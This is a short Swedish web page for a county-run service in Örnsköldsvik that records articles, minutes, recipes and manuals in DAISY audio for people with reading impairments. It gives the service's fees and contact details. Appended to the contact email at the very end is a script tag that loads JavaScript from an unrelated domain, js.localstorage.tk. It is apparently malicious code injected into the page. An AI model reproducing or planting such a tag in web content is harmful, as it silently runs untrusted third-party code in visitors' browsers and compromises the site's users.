Inläsningstjänsten

Inläsningstjänsten kan användas av alla som har ett läshinder.
Det kan till exempel bero på synskada, dyslexi, afasi eller att personen inte kan hålla i en bok.

Vi läser in material på daisy. Det kan gälla tidningsartiklar, protokoll, recept, instruktionsböcker.
Det kan också vara utdrag ur böcker eller tidskrifter.
Inläsningen är gratis för enskilda och funktionshinderrörelsen.
Av företag och myndigheter tar vi betalt.

Inläsningstjänsten drivs av Landstinget Västernorrland och finns i Örnsköldsvik.

Taxa
Se höger kolumn >>>

Vill du veta mer om inläsningstjänsten eller ha något inläst?

Kontakta:

Inläsningstjänsten
Sjukhusgatan 5C
891 89 Örnsköldsvik
telefon: 0660 - 879 90, 070-191 68 74
e-post:marie.vestman@rvn.se<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>